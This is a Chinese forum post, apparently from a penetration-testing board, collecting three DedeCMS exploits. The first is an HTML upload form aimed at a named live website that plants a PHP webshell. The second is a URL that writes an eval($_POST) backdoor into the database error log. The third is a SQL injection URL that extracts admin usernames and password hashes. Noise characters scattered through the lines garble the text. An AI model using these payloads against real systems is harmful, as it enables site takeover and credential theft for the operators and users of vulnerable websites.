  {( Q# h% T2 H  ^! {% [5 J: Z6 U- ^6 S8 ~
织梦(Dedecms)select_soft_post.php页面变量未初始漏洞
! L3 W2 S0 W/ I! V) D<html>
: u# E  l5 z, Q6 C/ j' B6 h<head># H: o# [3 \4 H$ ^0 z. P
<title>Dedecms v55 RCE Exploit Codz By flyh4t</title>. r; c+ R* i6 D7 ~
</head>
5 u7 y8 v+ p' i/ A! q7 F* @) y4 P<body style="FONT-SIZE: 9pt">
$ u: e7 J/ Z% O* a3 R* Q, @1 Y2 T! Y---------- Dedecms v55 RCE Exploit Codz By flyh4t---------- <br /><br />
/ t* n; i; h0 U) x6 N' M/ u& q<form action=http://www.nuanyue.com/uploads/include/dialog/select_soft_post.php method='POST' enctype="multipart/form-data" name='myform'>5 B( F( ?; `$ s$ d/ |
<input type='hidden' name='activepath' value='/data/cache/' />; p3 x3 l0 S  F7 K' {6 y
<input type='hidden' name='cfg_basedir' value='../../' />
5 n: n3 n+ @5 c: i; [<input type='hidden' name='cfg_imgtype' value='php' />
+ o, O& h2 W5 u! u<input type='hidden' name='cfg_not_allowall' value='txt' />
* x2 H; c' @) g! F9 i6 _! }<input type='hidden' name='cfg_softtype' value='php' />; ^9 F: O3 H! w$ p# c1 h
<input type='hidden' name='cfg_mediatype' value='php' />" ]2 c. c8 f% e% O
<input type='hidden' name='f' value='form1.enclosure' />
  b0 E; b: I( T# g) {/ x<input type='hidden' name='job' value='upload' />
/ f+ x7 K% H7 U+ M5 s4 ~<input type='hidden' name='newname' value='fly.php' />
# X1 u" m+ x- P5 I9 WSelect U Shell <input type='file' name='uploadfile' size='25' />4 f+ e- Y' g9 D' s3 K/ J( `) Y: }: r
<input type='submit' name='sb1' value='确定' />0 _3 a) u4 M. q$ j
</form>
" @$ a  X' ~) Z: K0 x+ D<br />It's just a exp for the bug of Dedecms V55...<br />
; h; m' C# Q. f* s3 j( WNeed register_globals = on...<br />
3 s, K; k$ i3 m/ sFun the game,get a webshell at /data/cache/fly.php...<br />/ s$ }1 v1 C# C# s7 ]; ~
</body>/ L( E) J# A2 D( g0 I. u" ~5 a
</html>
! Q; r" ?- ~% @0 e9 d
$ Z) ]  B" ^# c4 t: H6 s1 }% M3 J! ~4 s: ~& Z4 o: p
$ V7 F; V0 V% y! J  c

3 Z1 [. R  \) F/ M6 J3 c6 Y/ i9 B2 ]2 c
: ^- m6 j8 f+ o) i# T
) W% ?" `/ @0 h
6 g7 m; `6 M2 H" L1 \) ]: F' \8 j0 n
1 R) @- {' b1 D4 ~  ]* O3 z

: A% H9 R; ]" k; o  T& y( C/ D织梦(dedecms)5.3 – 5.5 plus/digg_frame.php 注入漏洞
) B" H8 U8 u( a: P. {& L2 u利用了MySQL字段数值溢出引发错误和DEDECMS用PHP记录数据库错误信息并且文件头部没有验证的漏洞。: [& h+ v/ K- Z7 c
1. 访问网址:
) w8 m$ g/ V+ N+ t/ t; l. y* z1 {http://www.abc.com/plus/digg_fra ... 024%651024&mid=*/eval($_POST[x]);var_dump(3);?># l! n& `5 `5 z
可看见错误信息$ u5 T4 ^. [- ?. ~; J) |7 [

6 T+ R3 a2 b7 O' A6 |
" m2 D+ R1 Y) H) r2. 访问 http://www.abc.com/data/mysql_error_trace.php 看到以下信息证明注入成功了。
& r- R0 @2 ]5 n% m4 P% Mint(3) Error: Illegal double '1024e1024' value found during parsing. V# \$ t4 c6 `0 n7 g4 S9 S
Error sql: Select goodpost,badpost,scores From `gxeduw_archives` where id=1024e1024 limit 0,1; */ ?>  W8 E$ G1 r$ W
& [' c+ a* W5 E
" {8 ^" g6 y  n4 H5 h
3. 执行dede.rar里的文件 test.html,注意 form 中 action 的地址是
2 ?  N( K+ k  e) r
6 A* m, f: g, q' L1 e$ T2 J; z' v0 p, b! m& y
<form action=”http://www.abc.com/data/mysql_error_trace.php” enctype=”application/x-www-form-urlencoded” method=”post”>1 P" l2 o/ P4 g# ^+ M" R
3 O0 D% [5 H$ x: I! |+ `2 L7 r

0 l0 j4 I: @' i3 A2 W8 @按确定后的看到第2步骤的信息表示文件木马上传成功.' O+ U& u/ J( b! ~+ U- R4 J+ `
# y; F. l; s4 i  x& M8 Z( m' M
1 d! y) A, x; ?
) i6 n. u: u0 ~( C- V7 t& x% n
5 U+ l2 a; T4 b  ]/ q4 N) W3 {0 q
" ^  ~9 Y# B9 P

+ l1 U3 h( D5 C( f6 U8 D5 r  b& D- B* U; ?% x
+ O2 @" J1 A4 C
6 }# c  v6 a) a" C3 L6 K# B
6 T( C7 ^" L6 V& c8 B7 w

, _6 @5 f  @& a2 X( k
7 u- |" T# {0 E5 i: ^6 _4 {织梦(DedeCms)plus/infosearch.php 文件注入漏洞
6 G, y! S/ u1 O5 h: P# y+ X" A4 ?http://localhost/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,userid,4,pwd,6%20from%20dede_admin/*



欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2